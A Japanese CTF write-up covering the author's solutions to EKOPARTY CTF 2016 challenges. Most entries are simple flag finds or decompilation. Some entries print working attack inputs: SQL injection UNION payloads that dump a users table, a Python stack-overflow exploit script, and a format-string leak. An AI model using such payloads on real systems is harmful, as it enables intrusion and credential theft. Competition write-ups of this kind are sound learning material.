EKOPARTY CTF 2016 供養(Writeup)
EKOPARTY CTF 2016に参加。575ptで182位。
Hidden inside EKO (misc, 50 points)
背景画像にFlagが書かれている。
EKO{th3_fl4g}
Mr. Robot (web, 25 points)
robots.txtにFlagの書かれたファイルへのパスがある。
EKO{robot_is_following_us}
RFC 7230 (web, 50 points)
ServerレスポンスヘッダにFlagがある。
$ curl -v https://ctf.ekoparty.org/static/files/for50_ed4b8625b6be1bd0.zip
* Trying 52.204.197.190...
* Connected to ctf.ekoparty.org (52.204.197.190) port 443 (#0)
* found 173 certificates in /etc/ssl/certs/ca-certificates.crt
* found 692 certificates in /etc/ssl/certs
* ALPN, offering http/1.1
* SSL connection using TLS1.2 / ECDHE_RSA_AES_256_GCM_SHA384
* server certificate verification OK
* server certificate status verification SKIPPED
* common name: ctf.ekoparty.org (matched)
* server certificate expiration date OK
* server certificate activation date OK
* certificate public key: RSA
* certificate version: #3
* subject: CN=ctf.ekoparty.org
* start date: Thu, 08 Sep 2016 22:26:00 GMT
* expire date: Wed, 07 Dec 2016 22:26:00 GMT
* issuer: C=US,O=Let's Encrypt,CN=Let's Encrypt Authority X3
* compression: NULL
* ALPN, server accepted to use http/1.1
> GET /static/files/for50_ed4b8625b6be1bd0.zip HTTP/1.1
> Host: ctf.ekoparty.org
> User-Agent: curl/7.47.0
> Accept: */*
>
< HTTP/1.1 200 OK
< Server: EKO{this_is_my_great_server}
< Date: Thu, 27 Oct 2016 23:36:39 GMT
< Content-Type: application/zip
< Content-Length: 20684
< Last-Modified: Tue, 25 Oct 2016 04:08:43 GMT
< Connection: keep-alive
< ETag: "580edacb-50cc"
< X-Frame-Options: SAMEORIGIN
< X-Content-Type-Options: nosniff
< X-XSS-Protection: 1; mode=block
< Strict-Transport-Security: max-age=63072000; preload
< Accept-Ranges: bytes
<
Super duper advanced attack (web, 100 points)
SQL injection問題。ユーザ定義変数にFlagがある。
' OR 1=1 -- ' UNION SELECT table_name, column_name FROM information_schema.columns -- ' UNION SELECT username, password FROM users -- ' UNION SELECT @flag, @flag --
EKO{do_not_forget_session_variables}
Welcome to the dark side (fbi, 25 points)
Tor Browserで与えられたonionドメインにアクセスすると、HTMLソースコードにFlagがある。
<!-- 25 - EKO{buy_me_some_b0ts} -->
Metadata (fbi, 50 points)
アクセスしたonionドメインのTLS証明書を見ると、subjectのOU(部門)にFlagがある。
50 - EKO{is_this_just_real_life_is_this_just_fantasy}
JVM (rev, 25 points)
user@vm-kali32:~$ unzip rev25_3100aa76fca4432f.zip
Archive: rev25_3100aa76fca4432f.zip
inflating: EKO.class
user@vm-kali32:~$ jad EKO.class
Parsing EKO.class...The class file version is 52.0 (only 45.3, 46.0 and 47.0 are supported)
Generating EKO.jad
user@vm-kali32:~$ cat EKO.jad
// Decompiled by Jad v1.5.8e. Copyright 2001 Pavel Kouznetsov.
// Jad home page: http://www.geocities.com/kpdus/jad.html
// Decompiler options: packimports(3)
// Source File Name: EKO.java
public class EKO
{
public EKO()
{
}
public static void main(String args[])
{
int i = 0;
for(int j = 0; j < 1337; j++)
i += j;
String s = (new StringBuilder()).append("EKO{").append(i).append("}").toString();
}
}
user@vm-kali32:~$ python
Python 2.7.9 (default, Mar 1 2015, 12:57:24)
[GCC 4.9.2] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> sum(xrange(1337))
893116
EKO{893116}
F#ck (rev, 50 points)
F#で書かれた.NET形式実行ファイル。ILSpyでデコンパイルすると次のようなコードがある。
using Microsoft.FSharp.Core;
using System;
using System.Globalization;
using System.IO;
[CompilationMapping(SourceConstructFlags.Module)]
public static class Program
{
[Serializable]
internal class teArr@9 : FSharpFunc<int, string>
{
public string str;
public int[] ccIndices;
internal teArr@9(string str, int[] ccIndices)
{
this.str = str;
this.ccIndices = ccIndices;
}
public override string Invoke(int i)
{
if (i == this.ccIndices.Length - 1)
{
return this.str.Substring(i);
}
int num = this.ccIndices[i];
return this.str.Substring(num, this.ccIndices[i + 1] - num);
}
}
public static string get_flag(string str)
{
int[] array = StringInfo.ParseCombiningCharacters(str);
int num = array.Length;
FSharpFunc<int, string> fSharpFunc = new Program.teArr@9(str, array);
if (num < 0)
{
Operators.Raise<Unit>(new ArgumentException(LanguagePrimitives.ErrorStrings.InputMustBeNonNegativeString, "count"));
}
string[] array2 = new string[num];
int num2 = 0;
int num3 = num - 1;
if (num3 >= num2)
{
do
{
array2[num2] = fSharpFunc.Invoke(num2);
num2++;
}
while (num2 != num3 + 1);
}
string[] array3 = array2;
Array.Reverse(array3);
return string.Join("", array3);
}
[EntryPoint]
public static int main(string[] argv)
{
if (argv.Length != 1)
{
ExtraTopLevelOperators.PrintFormatLine<Unit>(new PrintfFormat<Unit, TextWriter, Unit, Unit, Unit>("Usage: FlagGenerator.exe <FLAG>"));
}
else
{
string text = Program.get_flag("t#hs_siht_kc#f");
if (string.Equals(text, argv[0]))
{
FSharpFunc<string, Unit> fSharpFunc = ExtraTopLevelOperators.PrintFormatLine<FSharpFunc<string, Unit>>(new PrintfFormat<FSharpFunc<string, Unit>, TextWriter, Unit, Unit, string>("EKO{%s}"));
string func = text;
fSharpFunc.Invoke(func);
}
else
{
ExtraTopLevelOperators.PrintFormatLine<Unit>(new PrintfFormat<Unit, TextWriter, Unit, Unit, Unit>("BAD ANSWER"));
}
}
return 0;
}
}
文字列を逆順に並び換えたものがFlag。
$ python Python 2.7.12 (default, Jul 1 2016, 15:12:24) [GCC 5.4.0 20160609] on linux2 Type "help", "copyright", "credits" or "license" for more information. >>> 't#hs_siht_kc#f'[::-1] 'f#ck_this_sh#t'
EKO{f#ck_this_sh#t}
RrEeGgEeXx (rev, 75 points)
.NET形式実行ファイル。ILSpyでデコンパイルすると次のような正規表現チェックがあり、これを満たす文字列がFlag。
if (Program.check_regex("^.{40}$", input) && Program.check_regex("\\w{3}\\{.*\\}", input) && Program.check_regex("_s.*e_", input) && Program.check_regex("\\{o{2}O{2}o{2}", input) && Program.check_regex("O{2}o{2}O{2}\\}", input) && Program.check_regex("sup3r_r3g3x_challenge", input))
EKO{ooOOoo_sup3r_r3g3x_challenge_OOooOO}
Ultra baby (pwn, 25 points)
スタックバッファオーバーフロー脆弱性がある。Partial overwriteでリターンアドレスをFlag関数の先頭に書き換える。
from minipwn import *
#s = connect_process(['./ultrababy'])
s = socket.create_connection(('9a958a70ea8697789e52027dc12d7fe98cad7833.ctf.site', 55000))
print s.recv(8192)
s.sendall('A' * 0x18 + '\xf3' + '\n')
print s.recv(8192)
interact(s)
$ python test.py
Welcome, give me you best shot
EKO{Welcome_to_pwning_challs_2k16}
*** Connection closed by remote host ***
My first service I (pwn, 100 points)
Format string bugがある。次のようにしてスタック上のFlagが読める。
$ nc 9a958a70ea8697789e52027dc12d7fe98cad7833.ctf.site 35000 Welcome to my first service Please input the secret key: %p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p. Invalid key: (nil).0xa.(nil).(nil).(nil).0xa.(nil).0x454b4f7b.0x4c614269.0x67426566.0x3072647d.(nil).0x25702e25.0x702e2570.0x2e25702e.0x25702e25.0x702e2570.0x2e25702e.0x25702e25.0x702e2570.
$ python
Python 2.7.12 (default, Jul 1 2016, 15:12:24)
[GCC 5.4.0 20160609] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> "454b4f7b4c614269674265663072647d".decode('hex')
'EKO{LaBigBef0rd}'
所感
他に解きたかった問題は以下。
- Congested service (misc, 100 points)
- DCCPで接続する問題
- X-Flag (misc, 150 points)
- Carder (web, 150 points)
- Url shortener (web, 200 points)
- Find me (fbi, 100 points)
- Secure Upload Hidden Service (fbi, 200 points)
- Old times (rev, 100 points)
- IBM OS/400 save file data(拡張子SAVF)を読む問題
- Fuckzing reverse (rev, 250 points)
- Bleeding (pwn, 50 points)
- My first service II (pwn, 300 points)
- Certified Excel Hacker (for, 50 points)
パスワード付きのVBAマクロを読む問題隠しシートがあったらしい
- Damaged (for, 75 points)
- 破損したbmpファイルを読む問題
